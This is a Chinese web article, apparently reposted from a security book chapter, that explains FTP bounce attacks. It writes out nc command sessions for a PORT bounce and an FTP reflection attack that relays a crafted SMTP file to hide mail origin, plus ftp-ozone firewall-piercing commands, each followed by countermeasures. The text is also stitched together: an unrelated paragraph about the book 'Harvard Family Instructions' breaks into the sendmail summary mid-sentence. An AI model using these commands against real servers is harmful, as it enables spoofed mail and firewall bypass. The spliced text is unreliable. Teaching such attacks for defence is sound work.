PASS password
PORT 127,0,0,1,10,10
LIST
QUIT
#nc ftpserver 21
如果出现'425 Can't build data connection:Connection refused'这一行信息说明例中的服务器易
于受到攻击。说明服务器确实尝试过连接PORT中所指的主机/端口。多数配置正确的服务
器将给出不同的出错信息,或直接断开连接。
启用第三方FTP
允许任意使用PORT命令会带来某些问题,以某种巧妙的方式使用PORT AND PASV,可以

使FTP客户端某个服务器上的数据直接发送到另一个FTP服务器上,数据无需流经控制这
一操作的机器。Xftp支持这一功能。
FTP反射攻击
如果黑客能够向服务器上载文件,那他就可以使用PORT AND RETR命令传送任何数据。
例如有一个可写的incoming目录
hacker$cat anonymous_mail.smtp
HELO FTPSERVER.EXAMPLE.COM
mail from :user@some_host.com
rcpt to:mailbomb_recipient@other_host.com
data
....
hacker$ncftpput ftpserver incoming anonymous_mail.smtp
hacker$nc ftpserver 21
USER anonymous
PASS ftp@example.com
PORT 10,10,10,10,0,25
RETR anonymous_mail.smtp
QUIT
FTP服务器将把anonymous_mail.smtp文件发送到邮件服务器10.10.10.10 的SMTP(25)端口,
该文件被设计成正确的SMTP命令,并且邮件服务器认为FTP服务器就是连接的源机器,
有效防止它确定邮件真实来源的可能性。利用这种方法还可以攻击其它网络服务,POP,IMAP
OR lpd。些时,FTP服务器被认为是攻击源,而黑客就高枕无忧了。
对策:
限制服务器接收任意的PORT命令。确保jail目录下不存在所有人都可写的目录或文件。假
设FTP帐号用户ID为100组ID为200。则可使用下面命令找出这些文件
ftpserver# cd /path/to/jail
ftpserver# find . \( -user 100 -o -group 200 -o -perm -002 \) -a -ls
禁用SITE CHMOD命令,可限制用户把文件许可改为可写。
更好的办法是确保FTP区域不中存在属于匿名用户或能被其写入的文件。
对防火墙之后的FTP服务器端口的非授权访问
通常FTP服务器处于防火墙之后,并阻塞所有除FTP之外的所有访问。在FTP服务器发送
PASV之后,防火墙必须为数据连接打开给定的端口,并在传输完成后关闭它,但多数防火
墙并不保持会话的真实状态。而且会被欺骗打开端口。ftp-ozone脚本可用于攻击这种情况。
hacker$ftp-ozone ftpserver.example.com 79 &
hacker$nc ftpserver.example.com 79
对策:
用ftp-ozone测试FTP服务器。升级防火墙,此外ip_masq_ftp模块不再存此漏洞。或配置
服务器不使用PASV FTP。
对防火墙之后的FTP客户端端口的非授权访问
防火墙要想支持主动FTP,就必须提供方法转换PORT地址中的地址,并在防火墙外侧绑定
端口,然后将其正确地对应到实际的FTP客户端。如果不保护连接状态的完整记录,做到
这一点不容量,很多开发商选择绕过这一点选择更快的处理速度。黑客可以利用这一点欺骗
客户端,使用其发送伪造的PORT命令,就可以穿透防火墙与FTP客户端的任何端口建立
连接。
Ftpd-ozone脚本提供了一个用于欺骗防火墙的特制URL,将其发给客户,客户一旦单击这
个链接,FTP服务器所在机器就能连向位于防火墙之后的客户端。
对策:
用Ftpd-ozone脚本测试服务器,升级防火墙。ip_masq_ftp没有这个问题。使用PASV FTP。
使用Aftpd代替匿名FTP,编译时指定DREADONLY,它将只提供文件下载服务。而不能上传
文件。出连连接不使用20端口,即服务器不需要任何root权限。惟一在服务器外运行的命
令是/bin/ls。
Publicfile可作http and 匿名ftp服务器,安全性极高。它不支持任何有问题的传统功能(SITE
EXEC等),并对PORT AND PASV命令提供了适当的保护。而且不运行任何外部命令,包
括/bin/ls。
小结
sendmail是使用最广的邮件服务器,但保障其安全不是件容量的事情,所以应了解它的基础
聪明的人是吸取自己的教训,智慧的人是吸取别人的教训。男:相信我们每个人都能从自己、别人三十年的经历中吸取一点教训、受到几丝启发、收获若干知识,得到一些感想。《哈佛家训》这本书蕴藏着十分多的道理,不仅让我吸取到了不少知识与教训,也让我明白了做人的原则。
置,并且在设计时就考虑了安全性。但它们的使用不如sendmail广。资料相对较少。
主动和被动的FTP服务器都存在问题,最好的方法是不使用FTP服务器。如需支持匿名ftp
文件下载,应当运行WEB服务器。如Publicfile。如果服务器的用户必须上传文件,应当使
用scp or sftp来到代FTP。它们是SSH的组成部份。scp是一个安全的命令行复制程序,sftp
本质上与之相同,但拥有一个类似于ftp的交互界面。这两个程序可以保护口令免遭嗅探,
并且确保数据不会被攻击者破坏。
第十二章 Web服务和动态页面
生成HTTP请求
machine$telnet localhost 80
输入
HEAD / HTTP/1.0
它向服务器请求其文档树根目录“/”的头部信息。
头部信息会给黑客提供一些有用的信息,如服务器版本,操作系统,安装的模块等。
可以修改默认的头部信息以防止信息泄露。
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-102690-4.html
也行